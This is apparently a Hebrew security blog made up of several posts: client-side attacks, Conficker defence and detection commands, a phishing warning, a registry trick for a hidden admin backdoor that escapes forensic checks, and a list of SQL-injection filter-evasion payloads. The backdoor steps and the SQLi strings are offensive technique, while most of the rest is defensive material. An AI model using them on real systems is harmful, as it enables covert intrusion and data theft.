CLIENT SIDE ATTACKS ותחנות הקצה בארגון.

client silde attacks

קראקרים ברחבי העולם הבינו מזמן כי הדרך אל האושר עוברת תמיד דרך החוליה החלשה בשרRשרת.

או אם תרצו: KEYLOGGER = 1000 RAINBOW TABELS .

במקום להשקיע שבועות בפענוח נקודות התורפה של FW החברה ,או איזה חור אזוטרי אחר,

פשוט יותר זה לשכנע את יוסי מהכספים ללחוץ על לינק תמים ומשם "הם" כבר יעשו בשבילו את העבודה.

כל זה כמו שאמרתי - חדשות ישנות ואכן חברות משקיעות היום יותר בהגנה על המשתמש הפשוט בחברה .

אבל.. עדיין ניצבות בפני מנהל הרשת בעיות ניהול רבות בתחום לדוגמה:

1. ניהול PATCHS MICROSOFT- תהליך אטיי ומתמשך , היכולת "ליישר קו" מוגבלת וכלי הניהול השונים WSUSE,BIGFIX וכו עושים עבודה בינונית לכל היותר,דרישות ל RESTART והתנגשות עם אפליקציות קיימות IN HOUSE ושאר ירקות. בקיצור,לא נעים לבצע ROLLBACK ל6000 תחנות . מנהל רשת הגיוני יתקין רק את החלק הקריטי של העדכונים במקרה הטוב ,יפסח על עדכוני ה OFFICE ועדכונים "שוליים" אחרים ( REBOOT לעדכון MEDIA PLAYR? השתגעתם?) . גם תהליך הטמעת עדכונים ב IMAGES חדשים של החברה מצריך סט בדיקות ועדכון חודשי -שוב תוצאות בינוניות וחלקיות לכל היותר.
2. עדכוני אפליקציות אחרות- כמה מנהלי רשת מעדכנים את שאר האפליקציות ההכרחיות כיום לגרסה האחרונה? ADOBE,WINZIP וכו -מעט מאד.
3. ניהול חתימות עדכניות לאנטי וירוס.- גם כאן קשה מאד לקבל מיקשה אחד ברחבי הארגון , תחנות ב OFFLINE ,ניידים המתחברים ב VPN פעם בעשור , בעיות רשתיות מול שרת הניהול המרכזי ,שדרוגים הפוגעים ב CLIENT ושורה ארוכה של EXELUDES .גם כאן יסתפק מנהל הרשת ההגיוני ב75% הצלחה.
4. חסימת התקנים ניידים - גם כאן יאלץ מנהל הרשת לפתוח חסימות לאנשי VIP בחברה,צוותים טכניים שונים ושאר מקורבים.
5. personnal filrewall? hips? - קשים מאד לניהול והטמעה ,מיצרים גילויים שגויים (FP) ומכבידים על התחנות ועל העבודה השוטפת של המשתמשים.מנהל הרשת ,גם אם יטמיע פיצ'רים אלה ,תהיה זו ברוב המקרים הטמעה במינימום הקשחה.
6. הקשחת ססמאות,חינוך משתמשים ,הגנה פיזית,הצפנות וכו - גם כאן קיים שיפור כמובן אך הדרך עוד ארוכה.

כמו שאנו רואים - תחום הגנת תחנות הקצה אמנם השתפר אך עדיין ללא ספק לוקה בחסר .התקפות דרך תחנות הקצה בחברה יניבו פירות יפים ובאחוזים גבוהים .

בכל בדיקת חדירות , אני ממליץ לשלב גם client side attacks .

בפוסט הבא אני ידבר על metasploit 3.3 dev והשיפורים ביכולות לבצע התקפות מסוג זה דרכה.

conficker - מניעה-הגנה-גילוי-ניקוי

-קונפיקר בפעולה

...

איטיות כבדה ברשת הפנימית, גישות מוזרות לאינטרנט ושרתים שחדלו מלתת שירות נוrמלי .
טלפונים בהולים מאנשי הסיסטם והתקשורת בזמן ארוחת הצהריים שלי :" עשיתם שינוי בשרת ה AV?","הפצתם איזה משהו?"
אני עונה מיד שלא, ומסיים את הארוחה.
במשרד אני ניגש לבדוק לוגים בשרתי הAV - הכל רגיל,אך אני שם לב למיילים המתריעם על סריקת פורטים בSIM SOC שלנו...הממ משהו מוזר קורה.
בינתיים אנשי הסיסטם כבר מורטים שיערות ואני מנסה להבין את פשר הסריקות המוזרות בתוך הרשת .
מחשבים מנסים לצאת לאינטרנט בפורט 80 ולא דרך הפרוקסי...בעיית ניתוב? תקלה בהגדרות הפרוקסי?
שעה עוברת והתמונה מתחילה להיתבהר ,תמונה עגומה.
מחשבי הארגון סורקים את עצמם ולכיוון סגמטי השרתים בפורט 445 ללא הפסקה ,כל מחשב פותח חיבורים לפי יכולתו
10 - ++1000 ,חגיגה.
הלחץ מגיע לרמות חדשות , עכשיו זה כבר ברור : אני עד להתפרצות חזקה של וירוס ברשת .
אני בודק שוב ושוב את הלוגים מהאנטי וירוסים - נאדה! מה זה!
אנשי הסיסטם כבר מצאו לפחות 10 שמות של וירוסים המתאימים להתנהגות הוירוס ,אבל אף אחד לא מופיע לי על המסך.
אני מתקשר לאחד ממומחי הוירוסים בארץ שתמך בי פעמים רבות בעבר :"מה קורה איש, יש לנו ככה וככה...".
והוא עונה :" כן אני נמצא עכשיו בארגון יותר גדול ממכם, גם כאן המצב דומה , זה כנראה ZERO DAY ATTACK"
-אנחנו צריכים לבא ולקחת ביופסיה ממחשב נגוע ולשלוח לחברת האנטי וירוס שיכתבו לזה חתימה."
מההה! ZERO DAY?

כך למדתי להכיר את וירוס הקונפיקר.

הגנה -מניעה

• התקנת הפאצ' של מיקרוסופט kb958644 המונע את וקטור ההתקפה המרכזי דרכו חודר הקונפיקר לתחנה. - להוריד ולהתקין בהקדם האפשר על כל השרתים והתחנות.

לבדיקה מידית של המצאות ה PATCH על תחנה הריצו:

systeminfo find"KB958644" a

להורדת ה PATCH:

http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

• ביטול AUTORUN לכל סוגיו בתחנות ובשרתים = עצירת וקטור ההתקפה השני של הוירוס ( הדבקה דרך התקני USB ומדיות נשלפות אחרות).

העתק\הדבק את השורות הבאות לקובץ בסיומת REG. והרץ:

REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf] @="@SYS:DoesNotExist"

כמובן לא לשכוח לעדכן GPO :)

• 
  
  
  ביטול שיתופים אדמיניסטרטיביים ככל הניתן ומעבר על שיתופים ברשת תוך צימצום ההרשאות בכל שיתוף. -וקטור ההדבקה השלישי של הקונפיקר הוא באמצעות גישה לשיתופים בכלל ובפרט ל admin$ ,לצערי סעיף זה קשה לביצוע בשל שימוש אפליקטיבי בשיתופים הנ"ל אך ניתן לצמצם את ההרשאות לשיתופים כחלק מפעילות שוטפת של אבטחת מידע. במקרי קיצון של הדבקה מאסיבית ,ניתן להפעיל זמנית פונקציה הקיימת ברוב האנטי וירוסים - make all shares read only (ע"ע מקאפי).



• 
  
  
  הגבלה או מניעת הרשאות לספרית TASKS של windows - וריאנטים מסוימים של הוירוס יוצרים JOB -משימה המפעילה את מנגנון ההדבקה ,סגירת ההרשאות לספריה זו תמנע זאת.



• 
  
  
  יש לדאוג לAV מעודכן בחתימות ובמנוע האחרון ,יש לסרוק את הרשת הארגונית באמצעים נוספים למציאת תחנות ושרתים "סוררים" ללא AV או AV ב DISABLE ו\או מגון תקלות אחרוות.

גילוי:

• הקונפיקר משתמש במנגנון סריקה והדבקה די רעשניים אשר ניתן לזיהוי בקלות ע"י IPS או HIPS ,עומס ברשת יורגש בעיקר בפורטים 445 ו 139 וכן גישת מחשבים ושרתים לאינטרנט.



• GMER - כלי לבדיקת ROOTKITS והזרקת DLL לservices לגיטימיים של וינדוס - הקונפיקר מזריק את עצמו (DLL) ל svchost ,הכלי מזהה ומציג ( באדום) את השירות הנגוע ואת שם ה DLL הרלונטי , הוא מאפשר גם הסרה של ה DLL אך מנסיון הפעולה גוררת ברוב המקרים מסך כחול.



• tasklist /svc ----חיפוש פרוססים הרצים תחת scvhost וזיהוי פרוססמים בשמות מוזרים או לא מוכרים

svchost.exe 1068 AudioSrv, CryptSvc, Dhcp, dmserver, ERSvc, EventSystem, helpsvc, HidServ, lanmanserver,lanmanworkstation, Netman, Nla, RasMan,Schedule, seclogon, SENS, SharedAccess, ShellHWDetection, srservice, TapiSrv,Themes, TrkWks, W32Time, winmgmt, wscsvc,ddfr , wuauserv, WZCSVC

• 
  
  
  McAfee Conficker Detection Tool - כלי חינמי שיצא יחסית לאחרונה הסורק תחנות ורשתות למציאת מחשבים נגועים בקונפיקר , הכלי יודע לזהות (finger print) תחנות נגועות ללא צורך בהזדהות

הסרה :

במידה והAV מזהה ,גם אם האינדיקציה היא : removed או deleted , אני ממליץ לבצע REBOOT בכדי לאפשר ל AV להסיר שיירים בזיכרון.

שיהיה בהצלחה.

תרגיל פישינג חדש ב MSN!

לאחרונה אני מקבל מידידים ברשת MSN לינקים מוזרים כדוגמת: http://savycooper.catchedyou.com
מיתר לציין שידידי מתכחשים לשליחת הלינק .

הדף שנפתח כתוצאה מגלישה ללינק נראה ככה:הכנס EMAIL וסיסמה!
בבדיקת ה IP מתברר שהאתר ממוקם בסין או ליתר דיוק בהונג קונג מה שמעלה את החשד מיד לכוננות אדומה:)
בתחתית הדף מצויין במפורש שהאתר אינו אתר פישינג אלא אתר המבקש לעשות שימוש באמייל שלך לצורך קידום צרכים אחרים! קצת מזכיר את הבדיחה על ההוא שעושה את צרכיו ליד הלדת של השכן ואחר כך דופק בדלת ומבקש ניר טואלט .
ראו הוזהרתם!!!

backdoor - יצירת משתמש אדמין אשר אינו מופיע בקבוצת administrators

נניח שהשגתי גישה לשרת ואני מעונין להשאיר לי backdoor לפעמים הבאות...
הדרך הפשוטה ביותר היא יצירת יוזר אדמיניסטרטיבי
אבל מה? במקרה של forensics אפשר לעלות על זה שהתווסף יוזר לקבוצת האדמיניסטרטורים.
אז מה עושים במצב כזה?
מסתבר שרמת ההרשאות שאתה מקבל נקבעת ברג'יטרי. אז מה שאני הולך לתאר פה זה איך אני יוצר יוזר אדמיניסטרטיבי בלי שהוא ימצא בקבוצת האדמיניסטרטורים.
שלב ראשון: צריך להפעיל את הregedit בהרשאת system
מכיוון שרק למשתמש system יש הרשאות לKEY הספציפי.
איך מריצים regedit תחת system ?
הצעה אחת היא להפעיל CMD דרך ה tesk scheduler תחת הרשאות system.

הערך F שאתה רואה מקנה לחשבון administrator המקורי את ההרשאות שלו.
אם תיצור יוזר חדש. תתווסף לך ספריה תחת users.

ועכשיו יש לבצע העתקה של הערך F לF של החשבון החדש.אחרי שתתחבר עם היוזר שיצרת, תקבל יוזר אאדמיניסטרטיבי.

אם רוצים להיות extra stelth , במקום ליצור מתשמש חדש - נשנה את ה GUEST או את ה SUPPORT_388945a0

tip by k-zee

mRemote-All your remote connections in one place

mRemote allows you to manage all your remote connections in a single place. It currently

supports the RDP, VNC, SSH, Telnet, RAW, Rlogin, ICA and HTTP/S protocols

אחלה כלי חינמי המרכז לי את כל חיבורי ה REMOTE במקום אחד linux unix windows

בנוסף קיימת תמיכה בהעברת קבצים (SCP) , מהרו והורידו -הם תיכף יתחילו לקחת כסף!

mRemote- download

חקירת המצאות רוגלות במערכת באמצעות פקודות cmd פשוטות

קראתי מאמר של אד סקודיס (san instatute) המדבר על העובדה שחלק גדול מחקירת מחשבים החשודים כנגועים ב mallwares ניתנת לביצוע ע"י שימוש בפקודות built in במערכת ההפעלה.
מניסיוני כאיש אבטחת מידע בארגון גדול , אני נדרש לעתים תכופות לבדוק מחשבים החשודים כ"נגועים" ,ולעתים בזמן בדיקה זו אין ברשותי גישה לכילים מקצועיים וכלי GUI למיניהם. המאמר נותן הסברים לכל פקודה אך אני אחסוך את זה מימני ומימכם (אנחנו כבר מכירים את משמעות הפקודות...)
אז ברוח הOLD SCHOOL להלן מספר פקודות לזיהוי מהיר של יתכנות רוגלות במערכת.

netstat –ano

קבלת מידע על מערך התקשורת TCP UDP +PID בנוסף, החל מ 2SP ניתן להשתמש ב b- המאפשר הצגת התכניות (EXE) המתקשרות על כל פורט בהתאמה .ניתן לזהות במהירות תקשורת על פורטים לא סטנדרטיים +חיפוש הפורט ב GOOGLE , אני ממליץ על חיפוש בסיגנון: insite:mcafee.com port 4444

טבלהזו מציינת פורטים סטנדרטיים של שירותי מערכת -חשוב לדעת למניעת fals positive

*

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce

reg query HKCU\Software\Microsoft\Windows\CurrentVersionRun

מקומות נפוצים ב REGISTRY להמצאות רוגלות - ניתן להסיר את הרשומות החשודות ( לא לשכוח לגבות לפני:))

*

dir /A "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"

ישנם רוגלות הממקמות קבצים בספריה ידועה ונשכחת זו ...

*

'tasklist /svc'

מאפשרת צפיה בתהליכים ובתת תהליכים הרצים במערכת .

*

net users

net localgroup administrators

הצגת משתמשי המערכת - ישנם רוגלות ובוטים (BOTS) המוסיפים משתמשי מערכת - רצוי לבדוק זאת .

wmic startup list full

פקודה שהיתה חדשה לי עד לא מזמן ,מאפשרת קבלת נתונים מפורטים על כל התוכניות והתהליכים העולים ב startup . שימושי ביותר!

עד כאן.

לגבי פקודת WMIC - אני אפרט בפוסט נפרד

אני יותר שהזכרתי כאן נישכחות לחלק מהאנשים ,אך האמינו לי - הפקודות האלה שימושית ביותר .

Netrworking וזמישות...

בשבוע שעבר נכחתי בהרצאה מעניינת מאד NETWORKING בארגון, בתוך מחלקת ה IT ובכלל בחיים.
בגדול מדובר על יצירת קשרים אנושיים והרחבת הרשת החברתית של האדם במטרה ליצור "בני ברית" ושותפים טובים להנעת תהליכים בחברה בפרט ובחיים האישיים בכלל. רשמתי לי כמה נקודות לזכור מההרצאה:

המונח: agile - ז מ י ש - זרירזות וגמישות : מדד היכולת לקבל ולבצע שינויים בצורה זריזה וע"י כך להתמודד בצורה תחרותית וגמישה בשוק המשתנה.

1. בכל מקום ובכל סיטואציה ניתן לעשות networking
2. networking עושים עם מי שלא מכירים:)
3. רוב האנשים חיים ב"בועת הנוחות שלהם" והפחד מהחדש או הדחיה מהחדש הם מה שמעקבים את ההתפתחות שלהם.
4. networking מתבצע ע"י נתינה קודם כל , אין לחפש רווח אישי מידי - זו טעות!
5. ע"י עשייה מרובה עבור האדם השני ,יכולה להווצר שותפות טובה ובן ברית לעתיד , יש לזכור שמחקרים מראים ששותפויות טובות אינם מבוססות על 50-50 אלא על עשייה " מעל ומעבר " והשקעה של1000% כל אחד בשני. מודל ה 50-50 ב95 אחוז מהמקרים קורס.
6. אחת הדרכים להתקדמות ושבירת "תקרת הזכוכית" התעסוקתית היא דרך networking מול אנשים בדרגים גבוהים ממחלקות אחרות או תחומים אחרים .

זה מה שאני זוכר כרגע , לדעתי אוכל לצריך כאן את המצגת בקרוב.

צ'או

.

or 1=1 replacements

here or some Simple replacments to Evoid SQL Injection filters



OR '1' = '1'
OR 1 = 1

OR 'unusual' = 'unusual'
OR 'Simple' = 'Sim' + 'ple'
OR 'Simple'= N'simple' # the N dosent make any diffrence
OR 'Simple' > 'S'
OR 'Simple' < 'X' OR 'Simple' LIKE 'Sim%' OR 2 > 1
OR 'Simple' IN ('Simple')
OR 'Simple' BETWEEN 'R' and 'T'
/**/OR/**/'Simple'='Simple'

play with spaces or drop them completely



UNION SELECT

To escape any filter that checks a UNION followed by spaces and then the work SELECT –we can use a C like comment syntax available for most of DB's

UNION /**/ SELECT name…
/**/UNION/**/SELECT/**/name…

For ORACLE use:
'/**/OR/**/'Simple'='Simple'

For MySql use:

UN/**/ION/**/ SE/**/LECT/**

nmap & backtrack new versions

nmap 4.50 version has been released ,now including the Zenmap GUI that support all of nmap features .including a lot of bug fixing and support for new scripts.

BackTrack 3 beta has been released - including 900MB extended usb version and a strip down CD version , added drivers for many wifi cards and much more pen test fun stuff!

Guss Christmas gonna be fun after all :)

Got my CEH certification!